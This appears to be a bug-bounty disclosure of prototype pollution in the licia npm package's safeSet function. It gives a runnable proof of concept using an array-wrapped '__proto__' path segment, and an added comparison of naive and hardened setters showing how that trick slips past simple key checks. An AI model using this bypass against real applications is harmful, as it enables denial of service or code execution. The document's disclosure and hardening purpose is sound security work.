Prototype Pollution in liriliri/licia

Valid

Reported on

Sep 1st 2021


✍️ Description

The licia package is vulnerable to Prototype Pollution. The safeSet function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, adding a new property or modifying an existing one on all objects.

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
var licia = require("licia")
let obj = {}
console.log("Before: " + {}.polluted)
licia.safeSet(obj, [['__proto__'], 'polluted'], 'Yes! Its Polluted')
console.log("After: " + {}.polluted)

Execute the following commands in the terminal:

npm i licia # Install affected module
node poc.js #  Run the PoC

Check the Output:

Before: undefined
After: Yes! Its Polluted

💥 Impact

It may lead to Information Disclosure/DoS/RCE.
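
What a fix for this class of bug has to handle, as an added example that is not licia's code or the reporter's: naiveSet and hardenedSet are hypothetical, simplified path setters. A strict-equality check on the raw segment misses the array segment used in the PoC path, because JavaScript coerces the array to the string __proto__ when it is used as a property key.

```javascript
// Added example: simplified stand-ins, not licia's implementation.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);

// Naive guard: compares each raw segment with === before using it as a key.
function naiveSet(obj, path, val) {
  const keys = path.slice();
  const last = keys.pop();
  for (const k of keys) {
    if (k === '__proto__') return false; // ['__proto__'] !== '__proto__'
    if (obj[k] === undefined || obj[k] === null) obj[k] = {};
    obj = obj[k]; // the array key is coerced to the string '__proto__' here
  }
  obj[last] = val;
  return true;
}

// Hardened: only string/number segments, blocklist applied to the coerced
// key, and descent only through own properties of the target.
function hardenedSet(obj, path, val) {
  if (!Array.isArray(path) || path.length === 0) return false;
  const keys = [];
  for (const k of path) {
    if (typeof k !== 'string' && typeof k !== 'number') return false;
    if (BLOCKED.has(String(k))) return false;
    keys.push(String(k));
  }
  const last = keys.pop();
  for (const k of keys) {
    const own = Object.prototype.hasOwnProperty.call(obj, k);
    if (!own || obj[k] === null || typeof obj[k] !== 'object') obj[k] = {};
    obj = obj[k];
  }
  obj[last] = val;
  return true;
}

// Runs both setters against the path shape used in the PoC.
function demo() {
  const pocPath = () => [['__proto__'], 'polluted'];
  const naiveWrote = naiveSet({}, pocPath(), 'x');
  const naivePolluted = {}.polluted === 'x';
  delete Object.prototype.polluted; // undo the pollution before continuing
  const hardWrote = hardenedSet({}, pocPath(), 'x');
  const hardPolluted = {}.polluted !== undefined;
  return { naiveWrote, naivePolluted, hardWrote, hardPolluted };
}

console.log(demo());
```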

We have contacted a member of the liriliri/licia team and are waiting to hear back 2 years ago
ready-research submitted a
2 years ago
RedHoodSu marked this as fixed with commit 10006a 2 years ago
RedHoodSu has been awarded the fix bounty
This vulnerability will not receive a CVE